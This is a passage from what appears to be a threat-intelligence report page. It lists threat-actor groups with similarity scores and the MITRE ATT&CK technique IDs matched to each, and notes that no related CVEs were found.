  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection

APT38

Score: 16.47
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1055.004 - Asynchronous Procedure Call
  • T1590 - Gather Victim Network Information
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1493 - Transmitted Data Manipulation

Moonstone Sleet

Score: 7.61
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1027 - Obfuscated Files or Information

CURIUM

Score: 5.78
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1087.004 - Cloud Account

LAPSUS$

Score: 10.62
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1556.008 - Network Provider DLL
  • T1564.003 - Hidden Window

SilverTerrier

Score: 3.29
Matched TTPs:
  • T1131 - Authentication Package

FIN5

Score: 5.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging

Tonto Team

Score: 5.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1027.004 - Compile After Delivery

BlackByte

Score: 11.71
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1134.001 - Token Impersonation/Theft
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

APT19

Score: 8.42
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image

SideCopy

Score: 5.60
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1584.002 - DNS Server

Stealth Falcon

Score: 5.78
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account

Deep Panda

Score: 9.18
Matched TTPs:
  • T1177 - LSASS Driver
  • T1059.004 - Unix Shell
  • T1027.014 - Polymorphic Code

Axiom

Score: 6.91
Matched TTPs:
  • T1177 - LSASS Driver
  • T1049 - System Network Connections Discovery

APT37

Score: 8.81
Matched TTPs:
  • T1055.013 - Process Doppelgänging
  • T1078 - Valid Accounts
  • T1027.004 - Compile After Delivery

Velvet Ant

Score: 3.53
Matched TTPs:
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources

Confucius

Score: 7.96
Matched TTPs:
  • T1087.004 - Cloud Account
  • T1200 - Hardware Additions
  • T1665 - Hide Infrastructure

Rocke

Score: 4.14
Matched TTPs:
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery

Windshift

Score: 4.13
Matched TTPs:
  • T1078 - Valid Accounts

DarkHydrus

Score: 7.28
Matched TTPs:
  • T1531 - Account Access Removal
  • T1200 - Hardware Additions

TA551

Score: 4.61
Matched TTPs:
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image

Inception

Score: 5.90
Matched TTPs:
  • T1027.014 - Polymorphic Code
  • T1200 - Hardware Additions

DarkVishnya

Score: 4.54
Matched TTPs:
  • T1213.003 - Code Repositories

Threat actors related to this Pulse (inference-based)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1183 - Image File Execution Options Injection
  • T1027.004 - Compile After Delivery
  • T1597 - Search Closed Sources
  • T1087.004 - Cloud Account
  • T1601.001 - Patch System Image
  • T1213.006 - Databases
  • T1560.001 - Archive via Utility
  • T1098.007 - Additional Local or Domain Groups
  • T1051 - Shared Webroot
  • T1003.007 - Proc Filesystem
  • T1546.013 - PowerShell Profile
  • T1654 - Log Enumeration
  • T1665 - Hide Infrastructure
  • T1027.014 - Polymorphic Code
  • T1131 - Authentication Package

Sandworm Team

Score: 0.67
Matched TTPs:
  • T1183 - Image File Execution Options Injection
  • T1055.004 - Asynchronous Procedure Call
  • T1063 - Security Software Discovery
  • T1484.002 - Trust Modification
  • T1049 - System Network Connections Discovery
  • T1087.004 - Cloud Account
  • T1686.003 - Windows Host Firewall
  • T1075 - Pass the Hash
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1546.016 - Installer Packages

Volt Typhoon

Score: 0.67
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1099 - Timestomp
  • T1049 - System Network Connections Discovery
  • T1083 - File and Directory Discovery
  • T1686.003 - Windows Host Firewall
  • T1560.001 - Archive via Utility
  • T1488 - Disk Content Wipe
  • T1584.002 - DNS Server
  • T1003.007 - Proc Filesystem
  • T1546.016 - Installer Packages
  • T1665 - Hide Infrastructure

Related CVEs

No CVEs were found for this Pulse.
